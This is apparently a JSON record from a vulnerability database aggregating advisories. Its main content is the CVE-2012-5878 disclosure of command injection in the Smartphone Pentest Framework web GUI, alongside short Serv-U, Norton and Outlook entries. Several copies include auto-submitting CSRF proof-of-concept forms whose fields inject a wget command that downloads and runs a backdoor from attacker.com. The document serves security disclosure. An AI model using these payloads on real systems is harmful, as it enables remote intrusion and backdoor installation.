environment.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "modified": "2012-12-11T00:00:00", "published": "2012-12-11T00:00:00", "id": "SECURITYVULNS:DOC:28856", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28856", "title": "Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "Antivirus crash on scanning malformed PE files.", "modified": "2006-03-09T00:00:00", "published": "2006-03-09T00:00:00", "id": "SECURITYVULNS:VULN:5878", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5878", "title": "Norton Antivirus DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nServ-U FTP Server Potential Denial of Service Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA17409\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/17409/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nDoS\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nServ-U FTP Server 6.x\r\nhttp://secunia.com/product/5878/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in Serv-U, which potentially can be\r\nexploited by malicious people to cause a DoS (Denial of Service).\r\n\r\nThe vulnerability is caused due to an unspecified error and may be\r\nexploited to remotely crash the server via certain malformed\r\npackets.\r\n\r\nNOTE: The ZLib and OpenSSL libraries have also been changed to\r\nversion v1.2.3 and v0.9.8a respectively.\r\n\r\nSOLUTION:\r\nUpdate to version 6.1.0.4.\r\nhttp://www.serv-u.com/dn.asp\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by vendor.\r\n\r\nORIGINAL ADVISORY:\r\nhttp://www.serv-u.com/releasenotes.asp\r\n\r\nOTHER REFERENCES:\r\nSA17151:\r\nhttp://secunia.com/advisories/17151/\r\n\r\nSA16137:\r\nhttp://secunia.com/advisories/16137/\r\n\r\nSA15949:\r\nhttp://secunia.com/advisories/15949/\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-11-04T00:00:00", "published": "2005-11-04T00:00:00", "id": "SECURITYVULNS:DOC:10123", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10123", "title": "[SA17409] Serv-U FTP Server Potential Denial of Service Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "Shell characters problem allow javacript execution in local zone.", "modified": "2004-03-10T00:00:00", "published": "2004-03-10T00:00:00", "id": "SECURITYVULNS:VULN:3512", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:3512", "title": "Microsoft Outlook shell characters problem", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:22", "bulletinFamily": "exploit", "description": "", "modified": "2012-12-11T00:00:00", "published": "2012-12-11T00:00:00", "href": "https://packetstormsecurity.com/files/118743/Smartphone-Pentest-Framework-0.1.3-0.1.4-Command-Injection.html", "id": "PACKETSTORM:118743", "title": "Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection", "type": "packetstorm", "sourceData": "`Advisory ID: HTB23127 \nProduct: Smartphone Pentest Framework (SPF) \nVendor: Bulb Security LLC \nVulnerable Versions: 0.1.3, 0.1.4 and probably prior \nTested Versions: 0.1.3, 0.1.4 \nVendor Notification: November 19, 2012 \nPublic Disclosure: December 10, 2012 \nVulnerability Type: OS Command Injection [CWE-78] \nCVE Reference: CVE-2012-5878 \nCVSSv2 Base Score: 8.3 (AV:A/AC:L/Au:N/C:C/I:C/A:C) \nRisk Level: High \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine remotely. \n \nSimilar vulnerabilities were discovered (https://www.htbridge.com/advisory/HTB23123 , CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor. \n \nHowever, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. Therefore even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for the majority of pentesters) the vulnerabilities can still be easily exploited via a local/internal network, or even from the Internet via CSRF vector. In default installation of Smartphone Pentest Framework its web server port and application path of its GUI are easily predictable: localhost:80/frameworkgui/ \n \nPlease refer to HTB23123 advisory (https://www.htbridge.com/advisory/HTB23122) for detailed attack scenarios examples. \n \n \n1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5878 \n \nMultiple Perl scripts in the \"/frameworkgui/\" directory do not perform sanitation of user-supplied input passed as argument to the \"system()\" function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server user. \n \n1.1 The vulnerability exists in \"SEAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector. \n \nThe PoC code below will download a backdoor located on 'attacker.com' and run it on pentester's machine with privileges of the web server. Despite relatively low privileges attacker can always try to download all files accessible to him and/or escalate privileges to get remote root access to the system. \n \n \n<form action=\"http://localhost/cgi-bin/frameworkgui/SEAttack.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"platformDD2\" value='android' /> \n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.ch && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n \n \n1.2 The vulnerability exists in \"CSAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n \n \n<form action=\"http://localhost/cgi-bin/frameworkgui/CSAttack.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n \n \n1.3 The vulnerability exists in \"attachMobileModem.pl\" script due to insufficient validation of user-supplied input passed via the \"appURLPath\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n \n \n<form action=\"http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"appURLPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n \n \n1.4 The vulnerability exists in \"guessPassword.pl\" script due to insufficient validation of user-supplied input passed via the \"ipAddressTB\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n \n \n<form action=\"http://localhost/cgi-bin/frameworkgui/guessPassword.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"ipAddressTB\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nOn December 5, 2012 vendor replied that vulnerabilities are patched. However, on the Disclosure date version 0.1.4 was still found to be vulnerable. \n \nAs a temporary solution remove or disable SPF's GUI. \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23127 - https://www.htbridge.com/advisory/HTB23127 - Multiple Vulnerabilities in Smartphone Pentest Framework (SPF). \n[2] Smartphone Pentest Framework (SPF) - http://www.bulbsecurity.com/smartphone-pentest-framework/ - Smartphone Pentest Framework is an open source security tool, designed to aid in assessing the security posture of smartphones in an environment. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/118743/smartphonepentestfw-exec.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-04T07:20:47", "bulletinFamily": "exploit", "description": "Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities. CVE-2012-5878. Webapps exploit for cgi platform", "modified": "2012-12-10T00:00:00", "published": "2012-12-10T00:00:00", "id": "EDB-ID:38114", "href": "https://www.exploit-db.com/exploits/38114/", "type": "exploitdb", "title": "Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities", "sourceData": "source: http://www.securityfocus.com/bid/56881/info\r\n\r\nSmartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.\r\n\r\nRemote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.\r\n\r\nSmartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected. \r\n\r\n1.\r\n\r\n<form action=\"http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl\" \r\nmethod=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"platformDD2\" value='android' />\r\n<input type=\"hidden\" name=\"hostingPath\" value='a & wget \r\nhttp://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch && \r\n./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n2. \r\n\r\n<form action=\"http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl\" \r\nmethod=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"hostingPath\" value='a & wget \r\nhttp://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && \r\n./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n3.\r\n\r\n<form \r\naction=\"http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl\" \r\nmethod=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"appURLPath\" value='a & wget \r\nhttp://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && \r\n./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n4.\r\n\r\n<form \r\naction=\"http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl\" \r\nmethod=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"ipAddressTB\" value='a & wget \r\nhttp://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && \r\n./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/38114/"}], "htbridge": [{"lastseen": "2019-04-10T17:55:38", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine remotely. \nSimilar vulnerabilities were discovered (https://www.immuniweb.com/advisory/HTB23123, CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor. \nHowever, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. Therefore even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for the majority of pentesters) the vulnerabilities can still be easily exploited via a local/internal network, or even from the Internet via CSRF vector. In default installation of Smartphone Pentest Framework its web server port and application path of its GUI are easily predictable: localhost:80/frameworkgui/ \nPlease refer to HTB23123 advisory (https://www.immuniweb.com/advisory/HTB23123) for detailed attack scenarios examples. \n \n1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5878 \nMultiple Perl scripts in the \"/frameworkgui/\" directory do not perform sanitation of user-supplied input passed as argument to the \"system()\" function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server user. \n1.1 The vulnerability exists in \"SEAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector. \nThe PoC code below will download a backdoor located on 'attacker.com' and run it on pentester's machine with privileges of the web server. Despite relatively low privileges attacker can always try to download all files accessible to him and/or escalate privileges to get remote root access to the system. \n<form action=\"http://localhost/cgi-bin/frameworkgui/SEAttack.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"platformDD2\" value='android' /> \n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n1.2 The vulnerability exists in \"CSAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n<form action=\"http://localhost/cgi-bin/frameworkgui/CSAttack.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n1.3 The vulnerability exists in \"attachMobileModem.pl\" script due to insufficient validation of user-supplied input passed via the \"appURLPath\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n<form action=\"http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"appURLPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n\n", "modified": "2012-12-11T00:00:00", "published": "2012-11-19T00:00:00", "id": "HTB23127", "href": "https://www.htbridge.com/advisory/HTB23127", "type": "htbridge", "title": "Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF)", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C/"}}]}
